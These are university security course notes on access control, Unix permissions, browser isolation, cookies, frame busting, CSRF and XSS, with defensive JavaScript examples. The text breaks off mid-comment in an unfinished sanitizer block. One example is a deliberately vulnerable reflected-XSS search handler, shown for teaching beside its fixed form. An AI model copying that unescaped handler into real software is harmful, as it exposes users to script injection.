UNIT - 3 Notes

The document discusses concepts related to computer system security including access control, Unix and Windows access control, browser isolation, and web security threats. Access control limits access to systems and resources through identification, authentication, and authorization. Different access control models include attribute-based, discretionary, mandatory, and role-based access control. Browser isolation separates browsing activity from local devices and networks to reduce security risks by containing threats in isolated, disposable environments.

Uploaded by Sushant Yadav

BBDITM-054 COMPUTER SYSTEM SECURITY UNIT - 3

COMPUTER SYSTEM SECURITY


(KNC301)
UNIT -3

Secure architecture principles: isolation and least privilege

Access control concepts, Unix and Windows access control summary, other issues in access control, introduction to browser isolation.

Web security landscape: web security definitions, goals and threat models; HTTP content rendering; browser isolation; security interface; cookies, frames and frame busting; major web server threats; cross-site request forgery; cross-site scripting; defenses and protections against XSS; finding vulnerabilities; secure development.


Access Control

1. Access control is a method of limiting access to a system or to physical or virtual resources.

2. It is the process by which users are identified and granted specific privileges to systems, resources or information.

3. Access control is a security technique that governs who can view or use resources in a computing environment, and what each of them may see or do.

4. It is a fundamental concept in security that reduces risk to the business or organization.

5. Access control systems perform identification, authentication and authorization of users and entities by evaluating the login credentials presented, which may include passwords, PINs, biometric scans or other authentication factors.

6. Multi-factor authentication, which requires two or more authentication factors, is an important part of the layered defenses that protect access control systems.


Different Models Of Access Control

Different access control models are:

1. Attribute-Based Access Control (ABAC): access is granted or denied by evaluating a set of rules and policies over the attributes of the user (subject), the resource, the requested action and the environment (time, network location, device state).

2. Discretionary Access Control (DAC): the owner of a resource decides who may access it. Unix file permissions are the classic example: the file's owner sets the mode bits.

3. History-Based Access Control (HBAC): access is granted or denied by evaluating the past behaviour of the requesting party, such as the sequence of earlier requests, the time between requests and their content.

4. Identity-Based Access Control (IBAC): permissions are attached directly to individual identities, which lets administrators manage activity and access according to each user's requirements.

5. Mandatory Access Control (MAC): access rights are regulated by a central authority according to security labels (classification levels and categories) that neither the resource owner nor the user can change. Security-Enhanced Linux (SELinux) implements MAC on Linux.

6. Organization-Based Access Control (OrBAC): the policy designer expresses the security policy in terms of the organization's roles, activities and views, independently of any particular implementation.

7. Role-Based Access Control (RBAC): access is granted according to the user's role (job function) rather than to the individual. RBAC removes most case-by-case discretion when assigning access to objects; for example, a human resources specialist's role should carry no permission to create network accounts.

8. Rule-Based Access Control (RAC): access is decided by context-dependent rules, for example allowing students to use the labs only during certain hours of the day.
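The two models that appear most often in practice, RBAC and ABAC, are easiest to compare in code. The block below is an added example, not code from these notes: a minimal role table with a permission check beside a minimal attribute-rule engine with deny-overrides ordering and a default deny. Every role name, permission, user and rule in it is constructed sample data, including the HR/network-admin split and the student lab rule used as illustrations above.

```javascript
// Added example, not from the notes: a minimal RBAC engine and a minimal ABAC
// engine side by side. Role names, permissions, users and rules are all
// constructed sample data.

// ---------- RBAC: permissions are attached to roles, users hold roles ----------
const ROLE_PERMISSIONS = {
  hr_specialist: new Set(['employee:read', 'employee:update']),
  network_admin: new Set(['account:create', 'account:disable']),
};

// A user is allowed an operation when at least one of their roles grants it.
function rbacAllows(userRoles, permission) {
  return userRoles.some(role => (ROLE_PERMISSIONS[role] || new Set()).has(permission));
}

// ---------- ABAC: rules over subject, resource, action and environment ----------
// Deny rules are listed first so that a matching deny always wins ("deny overrides");
// if nothing matches, the default is deny.
const ABAC_RULES = [
  {
    name: 'deny-external-network',
    effect: 'deny',
    when: ({ env }) => env.network === 'external',
  },
  {
    name: 'owner-may-update-own-record',
    effect: 'permit',
    when: ({ subject, resource, action }) =>
      action === 'update' && resource.type === 'record' && resource.ownerId === subject.id,
  },
  {
    name: 'students-use-labs-in-hours',
    effect: 'permit',
    when: ({ subject, resource, action, env }) =>
      action === 'use' && resource.type === 'lab' && subject.role === 'student' &&
      env.hour >= 9 && env.hour < 17,
  },
];

// Evaluate a request {subject, resource, action, env} against the rules in order.
function abacDecide(request) {
  for (const rule of ABAC_RULES) {
    if (rule.when(request)) return { decision: rule.effect, rule: rule.name };
  }
  return { decision: 'deny', rule: 'default-deny' };
}

// Constructed example requests
const hrOnlyRoles = ['hr_specialist'];
const labRequest = {
  subject: { id: 's42', role: 'student' },
  resource: { type: 'lab', id: 'lab-1' },
  action: 'use',
  env: { hour: 10, network: 'campus' },
};

console.log(rbacAllows(hrOnlyRoles, 'account:create'));                                  // false
console.log(abacDecide(labRequest).decision);                                             // permit
console.log(abacDecide({ ...labRequest, env: { hour: 20, network: 'campus' } }).rule);    // default-deny
```

The point to notice is where the decision data lives: in RBAC the only thing that changes at run time is which roles a user holds, while in ABAC the environment (time, network) is part of every decision, which is what makes the "students only during lab hours" rule expressible without creating a new role.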

Implementation Of Access Control

Access control is implemented at three levels:

1. Administrative access control:

a. Administrative controls set the access control policies and procedures for the whole organization, define the implementation requirements for both physical and technical access control, and state the consequences of non-compliance.

b. Examples are the supervisory structure, staff and contractor controls, information classification, training, auditing and testing.

2. Physical access control:

a. Physical access control is critical to an organization's security and governs access to, or restriction of access to, a place such as a property, building or room.

b. Examples are fences, gates, doors and turnstiles, combined with locks, badges, biometrics (facial recognition, fingerprints), video surveillance cameras, security guards, motion detectors and mantrap doors, to admit people only to the areas they are permitted to enter.

3. Technical or logical access control:

a. Technical or logical access control limits connections to computer networks, system files and data.

b. It enforces restrictions through applications, protocols, operating systems, encryption mechanisms, etc.

c. Examples are access control lists, intrusion detection systems and antivirus software.


Characteristics And Features Of Unix

Characteristics of UNIX (as an operating system):

1. Memory management: it keeps track of primary memory, i.e. which parts are in use and by whom, and allocates memory when a program requests it.

2. Processor management: it allocates the CPU to a process and deallocates it when no longer required.

3. Device management: it keeps track of all devices and decides for how long, and to which process, each device is given.

4. File management: it allocates and deallocates file resources and decides which user or process may be given them.

5. Security: by means of passwords and other techniques it prevents unauthorized access to programs and data.

Features of UNIX:

1. Portable: Unix can be installed on many hardware platforms.

2. Multi-user: Unix allows multiple users to share the system concurrently.

3. Multi-tasking: Unix allows a user to run more than one program at a time. In fact, more than one program can be running in the background while the user is working in the foreground.

4. Networking: while Unix was developed as an interactive, multi-user, multi-tasking system, networking is incorporated into the heart of the operating system.

5. Organized file system: Unix has an organized file and directory system that allows users to organize and maintain files.

6. Device independence: Unix treats input/output devices as ordinary files. The destination of file input and output is easily controlled through the Unix design feature called redirection.

7. Utilities: Unix provides a rich library of utilities that increase the user's productivity.
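The unit's "Unix access control summary" is the discretionary permission check that the security feature above rests on: each file carries an owner, a group and nine permission bits, and exactly one of the three classes (owner, group, other) is consulted for a given process. The block below is an added example, not code from these notes, that implements that check and the ls-style rendering of a mode. The inodes, uids and gids are constructed samples, not real system state.

```javascript
// Added example, not from the notes: the Unix discretionary permission check
// in miniature. A file carries an owner uid, a group gid and a 9-bit mode
// (rwx for owner, group, other). Exactly one of the three classes applies to a
// given process, chosen in that order, so a mode like 0o007 refuses the owner
// even though "other" users may do anything. Sample files are constructed.

const R = 4, W = 2, X = 1;

// Render a mode as ls does, e.g. 0o750 -> "rwxr-x---".
function modeString(mode) {
  let out = '';
  for (let shift = 6; shift >= 0; shift -= 3) {
    const bits = (mode >> shift) & 7;
    out += (bits & R ? 'r' : '-') + (bits & W ? 'w' : '-') + (bits & X ? 'x' : '-');
  }
  return out;
}

// Does process `proc` {euid, egid, groups} have all of `want` (R|W|X bits) on `file`?
function unixAllows(file, proc, want) {
  if (proc.euid === 0) {
    // root (CAP_DAC_OVERRIDE) bypasses read/write checks; execute still needs
    // at least one x bit somewhere in the mode.
    return (want & X) === 0 || (file.mode & 0o111) !== 0;
  }
  let classBits;
  if (proc.euid === file.uid) {
    classBits = (file.mode >> 6) & 7;                                   // owner class
  } else if (proc.egid === file.gid || proc.groups.includes(file.gid)) {
    classBits = (file.mode >> 3) & 7;                                   // group class
  } else {
    classBits = file.mode & 7;                                          // other class
  }
  return (classBits & want) === want;
}

// Constructed sample inodes
const SAMPLE_FILES = {
  shadow: { path: '/etc/shadow', uid: 0, gid: 42, mode: 0o640 },          // root:shadow rw-r-----
  script: { path: '/home/alice/run.sh', uid: 1000, gid: 1000, mode: 0o750 },
  odd:    { path: '/home/alice/odd', uid: 1000, gid: 1000, mode: 0o007 },
};

const alice = { euid: 1000, egid: 1000, groups: [1000] };
const bob   = { euid: 1001, egid: 1001, groups: [1001, 42] };             // member of group 42
const root  = { euid: 0, egid: 0, groups: [0] };

console.log(modeString(SAMPLE_FILES.script.mode));        // rwxr-x---
console.log(unixAllows(SAMPLE_FILES.shadow, alice, R));   // false
console.log(unixAllows(SAMPLE_FILES.shadow, bob, R));     // true  (group class)
console.log(unixAllows(SAMPLE_FILES.odd, alice, R));      // false (owner class applies)
```

The `odd` file is the case worth remembering when auditing: a mode that looks permissive can still lock out the owner, and conversely a world-readable bit on a file like `/etc/shadow` would leak hashes to every account, which is why the sample keeps it at `rw-r-----` with only the `shadow` group able to read.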

Differentiate between Unix and Windows

1. Source: most Unix variants are open source; Windows is closed source.

2. Security: Unix has a long-established, simple permission model (owner/group/other read, write and execute bits, with root as the single privileged account); Windows uses richer but more complex NTFS access control lists, and its security depends heavily on correct configuration.

3. Interface: Unix is traditionally a command-based operating system; Windows is primarily driven through a graphical interface.

4. File system: in Unix everything is arranged in a single hierarchy under the root directory /; in Windows each drive (C:, D:, ...) is a separate root, so the file systems sit in parallel.

5. Usability: Unix is considered less user friendly; Windows is user friendly.

Browser Isolation

1. Browser isolation is a security model for web browsing that physically or logically separates an internet user's browsing activity from their local machine, network and infrastructure.

2. In this model each browser session is abstracted away from the endpoint hardware and from direct internet access, so that any harmful activity is trapped inside a disposable environment.

3. Browser isolation is also referred to as remote browser isolation, web isolation or remote browsing.

4. A major weakness of popular security tools is their limited protection against web or browser-based attacks, malware and ransomware, because the browser parses untrusted content from every site it visits.

5. By separating browsing activity from the endpoint hardware, the device's attack surface is reduced, sensitive data is protected, and the impact of both known and unknown threats is minimized.

6. It is an evolution of the older concepts of security through physical isolation and air-gapping.

Working Of Browser Isolation

1. Browser isolation works by giving users a disposable, non-persistent environment for browsing.

2. This can be implemented in several ways, but it always involves virtualization, containerization or cloud-hosted browsing, with only a rendered representation of the page (pixels or a sanitized copy of the DOM) sent to the user's device.

3. When the user closes the browsing session, or the session times out, the isolated environment is reset or discarded.

4. Any malicious code or harmful traffic is discarded with it, so it never reaches the endpoint device or the network.

5. Browser isolation treats all websites, files and content equally, labelling them as untrusted unless otherwise specified, instead of trying to classify them as good or bad.

6. Within the isolated environment, files can be rendered remotely or sanitized without being downloaded to the endpoint.

7. This differs from other security methods, which do not treat all content equally and instead filter it based on signs of a potential threat.

The Advantages And Disadvantages Of Browser Isolation

Advantages of browser isolation:

1. The primary benefit of browser isolation is that it stops malware delivered through the web browser from spreading to the endpoint.

2. It is more effective than signature-based antivirus against new threats, since it does not need to be programmed to recognize specific threats or risks.

Disadvantages of browser isolation:

1. Deploying browser isolation can be complex or expensive.

2. Users may experience slight delay or lag when browsing, because content is rendered remotely and streamed to the device.


Web Security With Its Goals

1. Web security is the process of protecting confidential data stored or processed online from unauthorized access and modification.

2. This is accomplished by enforcing strict policy measures.

3. Websites are scanned for possible vulnerabilities and malware by website security software. Such software can scan for backdoors, redirect hacks, Trojans and many other threats.

4. Website security software notifies the user if the website has any issue and proposes remediation.

5. It is the collective term for all the methods and measures we can use and enforce to keep the files behind our website, and our customers' data, safe.

6. Security should be built into a website from the beginning, but certain systems, such as WordPress, allow security measures to be installed at any time at little or no cost.

The goals of web security are to identify the following:

1. The critical assets of the organization.

2. The genuine users who may access the data.

3. The level of access granted to each user.

4. The vulnerabilities that may exist in the application.

5. Data criticality, and the risk of data exposure.

6. Appropriate remediation measures.

Threat Modelling

1. Threat modelling is a procedure for improving the security of a system by identifying its objectives and vulnerabilities and then defining countermeasures to prevent, or mitigate the effects of, threats to the system.

2. In this context, a threat is a potential or actual adverse event, which may be malicious (such as a denial-of-service attack) or incidental (such as the failure of a storage device), that can compromise the assets of an enterprise.

3. The key to threat modelling is determining where the most effort should be applied to keep a system secure.

4. Threat modelling is an iterative process that consists of defining enterprise assets, identifying what each application does with respect to those assets, creating a security profile for each application, identifying potential threats, prioritizing them, and documenting adverse events and the actions taken in each case.

5. Threat modelling is a structured approach to identifying, quantifying and addressing threats.

6. It allows system security staff to communicate the potential damage of security flaws and to prioritize remediation efforts.

Purpose of Threat Modelling

1. The purpose of threat modelling is to identify, communicate and understand threats and their mitigations for the organization's stakeholders as early as possible in the development life cycle.

2. The documentation produced by the process gives system analysts and defenders a complete analysis of the probable attacker profile.

Rendering

1. In computer graphics, rendering (image synthesis) is the automatic process of generating a photorealistic or non-photorealistic image from a 2D or 3D model by means of computer programs; the result of displaying such a model is also called a render.

2. In a web browser, the rendering engine (the term is often used interchangeably with browser engine) is the component responsible for laying out our website on the audience's screen.

3. The rendering engine is responsible for painting the page and for the animations used on the website.

4. It creates the visuals on the screen, lighting the pixels exactly as intended so that the website looks and feels the way it was designed to.

Steps for what happens when we surf the web:

1. We type a URL into the address bar of our preferred browser.

2. The browser parses the URL to find the protocol (scheme), host, port and path, and forms an HTTP request.

3. To reach the host, it first needs to translate the human-readable host name into an IP address, which it does with a DNS lookup.

4. A socket is then opened from the user's computer to that IP address on the specified port (80 for plain HTTP, 443 for HTTPS; for HTTPS a TLS handshake takes place before any HTTP is sent).

5. When the connection is open, the HTTP request is sent to the host.

6. The host forwards the request to the server software configured to listen on that port.

7. The server inspects the request and invokes the plugin or application needed to handle it.

8. The plugin gets access to the full request and starts to prepare an HTTP response.

9. The plugin combines the response data with some metadata (status line and headers) and sends the HTTP response back to the browser.

10. The browser receives the response and parses the HTML in it; a DOM tree is built from the parsed (and, if necessary, error-corrected) HTML.

11. New requests are made to the server for each additional resource found in the HTML source (typically images, style sheets and JavaScript files).

12. Style sheets are parsed, and the rendering information in each is attached to the matching node in the DOM tree.

13. JavaScript is parsed and executed; DOM nodes are added, moved or removed and style information is updated accordingly.

14. The browser renders the page on the screen according to the DOM tree and the style information for each node.

15. We see the page on the screen.

Since step 10 builds the DOM from whatever the server sent, any attacker-controlled text that reaches the response unescaped becomes part of that DOM, which is what cross-site scripting exploits.

List Of Rendering Engines Produced By Major Web Browser Vendors:

1. Blink: used in Google Chrome, Opera and current (Chromium-based) Microsoft Edge.

2. WebKit: used in Safari.

3. Gecko: used in Mozilla Firefox.

4. Trident: used in Internet Explorer (legacy).

5. EdgeHTML: used in the original Microsoft Edge (legacy).

6. Presto: legacy rendering engine for Opera.

Security Interface Framework

1. The Security Interface Framework (macOS) is a set of Objective-C classes that provide user interface elements for programs that implement security features such as authorization, access to digital certificates, and access to items in keychains.

2. A user interface (UI) defines the way humans interact with an information system.

3. A user interface is a series of pages, screens, buttons, forms and other visual elements that are used to interact with the device. Every app and every website has a user interface.

4. User interface design is the creation of graphics, illustrations, photographic artwork and typography that enhance the display and layout of a digital product across its various device views.

5. Interface elements consist of input controls (buttons, drop-down menus, data fields), navigational components (search fields, sliders, icons, tags) and informational components (progress bars, notifications, message boxes).

Cookies and Frame Busting

Cookies:

1. Cookies are small pieces of text that the web server asks the browser to store, via the Set-Cookie response header, and that the browser sends back on later requests to the same site.

2. The first time we visit a page, a new cookie is created; it holds information (for example a session identifier) that the website operator can read back on subsequent requests.

3. Browsers store cookies either as individual files or, in many cases, all together in a single file or database.

4. The text of a cookie is subdivided into attributes that are set individually: the name=value pair, and flags such as Expires/Max-Age, Domain, Path, Secure, HttpOnly and SameSite, which determine when and to whom the browser will send it.
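The attributes in point 4 are what decide whether a session cookie can be stolen over plain HTTP, read by injected script, or ridden by a cross-site request. The block below is an added example, not code from these notes: a small Set-Cookie parser followed by an audit of the security-relevant attributes. The headers it checks are constructed samples, not captured from any real site.

```javascript
// Added example, not from the notes: parse a Set-Cookie header into its
// attributes and audit the ones that matter for security. The headers below
// are constructed samples, not captured from any real site.

// Split "name=value; Attr1; Attr2=val" into { name, value, attributes }.
// Attribute names are case-insensitive, so they are lower-cased as keys.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map(s => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: eq === -1 ? pair : pair.slice(0, eq),
    value: eq === -1 ? '' : pair.slice(eq + 1),
    attributes: {},
  };
  for (const attr of rest) {
    if (!attr) continue;
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).trim().toLowerCase();
    cookie.attributes[key] = i === -1 ? true : attr.slice(i + 1).trim();
  }
  return cookie;
}

// Return a list of findings; an empty list means the cookie is set the way a
// session cookie should be.
function auditCookie(cookie) {
  const a = cookie.attributes;
  const findings = [];
  if (!a.secure) findings.push('missing Secure: cookie would be sent over plain HTTP');
  if (!a.httponly) findings.push('missing HttpOnly: readable by page script, so XSS can steal it');
  const sameSite = typeof a.samesite === 'string' ? a.samesite.toLowerCase() : null;
  if (!sameSite) {
    findings.push('missing SameSite: relies on browser default (Lax in Chromium, not everywhere)');
  } else if (sameSite === 'none' && !a.secure) {
    findings.push('SameSite=None without Secure: browsers reject or ignore this');
  }
  if (cookie.name.startsWith('__Host-')) {
    // The __Host- prefix is only honoured with Secure, Path=/ and no Domain attribute.
    if (!a.secure || a.path !== '/' || a.domain !== undefined) {
      findings.push('__Host- prefix requires Secure, Path=/ and no Domain attribute');
    }
  }
  return findings;
}

// Constructed sample headers
const GOOD = 'sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Strict';
const WEAK = 'sessionid=abc123; Path=/';
const BAD_PREFIX = '__Host-sid=xyz; Path=/; Secure; HttpOnly; SameSite=Lax; Domain=example.com';

console.log(auditCookie(parseSetCookie(GOOD)));        // []
console.log(auditCookie(parseSetCookie(WEAK)).length); // 3
```

Run against a real response, the same audit is a one-line check in a proxy or test suite; the SameSite finding is the one that ties this section to cross-site request forgery later in the unit, since a Lax or Strict session cookie is withheld from cross-site POSTs.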

Frame busting:

1. Frame busting refers to code or markup provided by a web page with the intention of preventing the page from being loaded inside a sub-frame (an iframe) of another site.

2. Frame busting is the classic defense against clickjacking and is also required to secure image-based authentication such as the sign-in seal once used by Yahoo.

3. A sign-in seal displays a user-selected image that authenticates the Yahoo login page to the user.

4. Without frame busting, the correct image is displayed to the user even though the top page is not the real Yahoo login page, because the genuine page has simply been framed.

5. Newer clickjacking techniques that use drag-and-drop to extract data from, or inject data into, frames make frame busting even more critical.

6. Script-based frame busting can be defeated (for example by a sandboxed iframe, or by the framing page blocking the navigation), so today the primary defense is a response header: X-Frame-Options: DENY (or SAMEORIGIN) and the Content-Security-Policy frame-ancestors directive, with the script kept only as a fallback for old browsers.
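Both layers of the defense are short enough to show together. The block below is an added example, not code from these notes: the script-based frame buster described above (kept as a string, since it only runs inside a browser page), a helper that emits the header-based defense, and a small model of how a browser applies those headers so the two can be compared. The origins are constructed.

```javascript
// Added example, not from the notes: the two layers of clickjacking defense.
// FRAME_BUSTER is the script-based technique the notes describe (a string,
// because it only runs inside a browser page); framingHeaders() builds the
// header-based defense, and mayFrame() models how a browser applies those
// headers. All origins are constructed.

// Legacy frame busting: hide the body by default and only reveal it when the
// page is the top-level document, otherwise navigate the top window to ourselves.
const FRAME_BUSTER = [
  '<style id="anti-cj">body { display: none !important; }</style>',
  '<script>',
  '  if (self === top) {',
  '    document.getElementById("anti-cj").remove();  // not framed: show page',
  '  } else {',
  '    top.location = self.location;                 // framed: break out',
  '  }',
  '</script>',
].join('\n');

// Header-based defense. With no allowed framers: deny everything. With a list
// of partner origins: CSP frame-ancestors carries the list (X-Frame-Options
// cannot express one, so it falls back to SAMEORIGIN for old browsers).
function framingHeaders(allowedOrigins = []) {
  if (allowedOrigins.length === 0) {
    return {
      'X-Frame-Options': 'DENY',
      'Content-Security-Policy': "frame-ancestors 'none'",
    };
  }
  return {
    'X-Frame-Options': 'SAMEORIGIN',
    'Content-Security-Policy': `frame-ancestors 'self' ${allowedOrigins.join(' ')}`,
  };
}

// Model of the browser decision: frame-ancestors, when present, takes
// precedence over X-Frame-Options; with neither header, framing is allowed.
function mayFrame(headers, pageOrigin, framerOrigin) {
  const csp = headers['Content-Security-Policy'] || '';
  const directive = csp.split(';').map(s => s.trim()).find(d => d.startsWith('frame-ancestors'));
  if (directive) {
    const sources = directive.split(/\s+/).slice(1);
    if (sources.includes("'none'")) return false;
    return sources.some(src => src === framerOrigin || (src === "'self'" && framerOrigin === pageOrigin));
  }
  const xfo = (headers['X-Frame-Options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return framerOrigin === pageOrigin;
  return true;
}

const bank = 'https://bank.example';
console.log(mayFrame(framingHeaders(), bank, 'https://attacker.example'));                           // false
console.log(mayFrame(framingHeaders(['https://partner.example']), bank, 'https://partner.example')); // true
console.log(mayFrame({}, bank, 'https://attacker.example'));                                         // true
```

The last line is the check worth automating: a page that sends neither header is frameable by anyone, whatever its script does, because the attacker's page can load it in a sandboxed iframe where `top.location` assignment is refused.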


Major Web Server Threats

1. Injection flaws:

a. Injection flaws, such as SQL injection and OS command injection, occur when untrusted data is sent to an interpreter as part of a command or query.

b. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

2. Broken authentication: application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys or session tokens, or to exploit other implementation flaws to assume other users' identities.

3. Sensitive data exposure:

a. Many web applications and APIs do not properly protect sensitive data such as financial or healthcare records.

b. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft or other crimes.

c. Sensitive data may be compromised unless it is given extra protection, such as encryption at rest and in transit, and it requires special precautions when exchanged with the browser.

4. XML External Entities (XXE):

a. Many older or poorly configured XML processors evaluate external entity references within XML documents.

b. External entities can be used to disclose internal files using the file:// URI handler, to reach internal file shares, to scan internal ports, to achieve remote code execution and to mount denial-of-service attacks.

5. Broken access control:

a. Restrictions on what authenticated users are allowed to do are often not properly enforced.

b. Attackers can exploit these flaws to access unauthorized functionality and/or data, for example accessing other users' accounts, viewing sensitive files, modifying other users' data or changing access rights.

6. Security misconfiguration:

a. Exploits application-stack weaknesses such as unpatched software, zero-day threats and default accounts that were never removed.

b. Also exploits misconfigured HTTP headers and verbose error messages that leak sensitive information.
7. Cross-Site Scripting (XSS):

a. Injects malicious code into a trusted site so that scripts execute in the victim's browser, where they can hijack user sessions or redirect the user to malicious sites.

b. Cross-site scripting is a common vector that inserts malicious code into a web application found to be vulnerable. Unlike other web attack types, such as SQL injection, its target is not our web application itself: it targets the application's users, resulting in harm to our clients and to the reputation of our organization.

8. Reflected XSS:

a. Reflected XSS uses a malicious script that the web application reflects back to a visitor's browser.

b. Initiated via a link, a request carrying the payload is directed to the vulnerable website.

c. The web application then echoes the payload into its response, which activates the harmful script in the victim's browser.

9. Cross-Site Request Forgery (CSRF):

a. Also known as XSRF, Sea Surf or session riding, cross-site request forgery deceives the user's browser, while it is logged in to our application, into submitting an unauthorized action.

b. A CSRF attack can transfer funds or change passwords on the user's behalf; combined with other weaknesses it can also lead to stolen session cookies and business data.

10. Man in the Middle Attack (MITM):

a. A man-in-the-middle attack occurs when a bad actor positions himself between the application and an unsuspecting user.

b. MITM can be used for eavesdropping or for impersonation.

c. Account credentials, credit card numbers and other personal information can then easily be harvested by the attacker.

11. Phishing attack:

a. Phishing is set up to steal user data such as credit card details and login information.

b. The perpetrator, posing as a trustworthy entity, fools the victim into opening an email, text message or instant message.

c. The victim is then lured into clicking a link that hides a payload.

d. Such an action can cause malware to be covertly installed.

e. Ransomware may then freeze the user's PC, or sensitive data may be passed to the attacker.

12. Remote File Inclusion (RFI):

a. Remote File Inclusion exploits weaknesses in web applications that dynamically include external scripts based on user-supplied input.

b. Taking advantage of that function, an RFI attack makes the server load attacker-hosted code and takes over the system.

13. Insecure deserialization:

a. Insecure deserialization often leads to remote code execution.

b. Even when deserialization flaws do not result in remote code execution, they can be used to perform attacks including replay attacks, injection attacks and privilege escalation.

14. Using components with known vulnerabilities: this occurs when attackers are able to exploit vulnerable libraries, frameworks and other modules that run with the same privileges as the application.

15. Insufficient logging and monitoring: insufficient logging and monitoring allows attackers to attack systems, maintain persistence, pivot to more systems, and tamper with, extract or destroy data without being noticed.

16. Backdoor attack:

a. A backdoor is a form of malware that circumvents login authentication to enter a system.

b. Many organizations offer employees and partners remote access to application resources, including file servers and databases, which gives a backdoor a convenient channel.

c. This enables bad actors to run system commands on the compromised system and keep their malware updated.

d. The attacker's files are usually heavily cloaked, making detection problematic.

Cross-Site Request Forgery

1. Cross-site request forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated.

2. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request.

3. With the help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing.

4. If the victim is a normal user, a successful CSRF attack can force the user to perform state-changing requests such as transferring funds or changing their email address.

5. If the victim is an administrative account, CSRF can compromise the entire web application.

6. CSRF is an attack vector that tricks a web browser into executing an unwanted action in an application to which the user is logged in; it works because the browser automatically attaches the session cookie to every request to that application, whichever site triggered the request.

7. A successful CSRF attack can be devastating for both the business and the user. It can result in damaged client relationships, unauthorized fund transfers, changed passwords and data theft.

8. Because the unsuspecting user is authenticated to the application at the time of the attack, the application cannot distinguish a legitimate request from a forged one on the basis of the session cookie alone.

Prevent CSRF Attack

CSRF attacks can be prevented in two ways:

1. On the user side: user-side prevention is very inefficient in terms of browsing experience; it amounts to browsing with only a single tab open at a time and not using "remember me" functionality, so that no authenticated session exists while other sites are open.

2. On the server side:

a. There are many proposed ways to implement CSRF protection on the server side, among which the use of CSRF tokens is the most popular.

b. A CSRF token is an unpredictable string that is tied to the user's session but is not submitted automatically by the browser: it has to be placed in the page (for example in a hidden form field or a custom header) and sent back with the request.

c. The website proceeds only when it receives a valid CSRF token along with the cookies. Since an attacker's page cannot read the user-specific token, the attacker cannot perform actions on the user's behalf.

d. Setting the session cookie with SameSite=Lax or Strict adds defense in depth, because the browser then withholds the cookie from cross-site requests.


Cross-Site Scripting

1. Cross-site scripting (XSS) is a vulnerability in a web application that allows a third party to execute a script in the user's browser with the privileges of the web application's own origin.

2. Cross-site scripting is one of the most prevalent vulnerabilities on the web.

3. Exploitation of XSS against a user can lead to consequences such as account compromise, account deletion, privilege escalation, malware infection and many more.

4. It allows an attacker to masquerade as the victim user, to carry out any actions that the user is able to perform and to access any of the user's data.

5. If the victim user has privileged access within the application, the attacker may be able to gain full control over all of the application's functionality and data.

Types Of Cross Site Scripting (XSS)

There are two main types:

1. REFLECTED XSS:

i. If the payload has to be supplied with each request in order to execute, the XSS is called reflected.

ii. These attacks are mostly carried out by delivering the payload directly to the victim, typically in a link.

iii. The victim requests a page with a request containing the payload, and the payload is embedded in the response as a script.

iv. An example of reflected XSS is XSS in a search field, where the search term is echoed back into the results page.

2. STORED XSS:

i. When the payload is stored on the server in such a way that the script is executed on every visit, without the payload being submitted again, it is identified as stored XSS.

ii. An example of stored XSS is XSS in a comment thread, where every reader of the comment runs the script.


Different Ways Used To Prevent XSS

Different ways used to prevent XSS are:

1. Escaping (output encoding):

a. The first method used to prevent XSS vulnerabilities in our applications is escaping user-controlled data at the point where it is written into the page.

b. Escaping data means taking the data an application has received and making it safe before rendering it for the end user.

c. By escaping, key characters in the data will be prevented from being interpreted as markup or code by the browser.

d. In essence, we encode the characters that have meaning in HTML, especially <, >, &, " and ', so that the browser displays them literally instead of parsing them; the correct encoding depends on the context (HTML body, attribute, JavaScript, URL) into which the data is placed.

2. Validating input:

a. Validating input is the process of ensuring that an application accepts only well-formed data, preventing malicious data from doing harm to the site, database and users.

b. While whitelisting and input validation are more commonly associated with SQL injection, they can also be used as an additional line of defense against XSS.

c. Blacklisting (disallowing certain predetermined characters in user input) blocks only known bad characters, whereas whitelisting allows only known good characters and is the better method for preventing XSS attacks as well as others.

d. Input validation is especially helpful in forms, since it stops a user from entering special characters into fields that should never contain them, rejecting the request instead.

e. However, input validation is not the primary defense against vulnerabilities such as XSS and SQL injection; it reduces the impact should an attacker discover such a vulnerability, while escaping and parameterization remain the primary controls.

3. Sanitizing:

a. A third way to prevent cross-site scripting attacks is to sanitize user input.

b. Sanitizing data is a strong defense, but should not be used alone to counter XSS attacks.

c. Sanitizing user input is especially helpful on sites that allow HTML markup, to ensure that the data received can do no harm to users or to our database: the data is scrubbed of potentially harmful markup, and unacceptable input is changed into an acceptable format.
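The three defenses map directly onto the two examples given in the XSS types section above: escaping fixes the reflected search field, an allowlist validator keeps markup out of fields that never need it, and a sanitizer handles the stored comment thread where some HTML must be kept. The block below is an added example, not code from these notes, with the vulnerable search handler kept beside its fixed form. The payloads are constructed, and the sanitizer is a deliberately small tag allowlist for teaching the escape-then-re-enable pattern, not a substitute for a maintained library such as DOMPurify.

```javascript
// Added example, not from the notes: the three defenses above applied to the
// two classic cases from the XSS section (a reflected search field and a stored
// comment). The vulnerable handler is kept beside the fixed one. All inputs are
// constructed; the sanitizer is a deliberately small tag allowlist for teaching,
// not a replacement for a maintained library such as DOMPurify.

// 1. Escaping (output encoding for the HTML body context).
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, ch => HTML_ESCAPES[ch]);
}

// Reflected XSS: the search term is echoed straight into the page.
function searchPageVulnerable(query) {
  return `<p>Results for: ${query}</p>`;
}
// Fixed: the same page with the term escaped at the point of output.
function searchPage(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}

// 2. Validating input with an allowlist: a username may only contain these
//    characters, so markup can never enter the field at all.
function isValidUsername(name) {
  return /^[A-Za-z0-9_]{3,32}$/.test(name);
}

// 3. Sanitizing stored HTML (comment thread): escape everything, then re-enable
//    a bare allowlist of formatting tags. Tags carrying attributes stay escaped,
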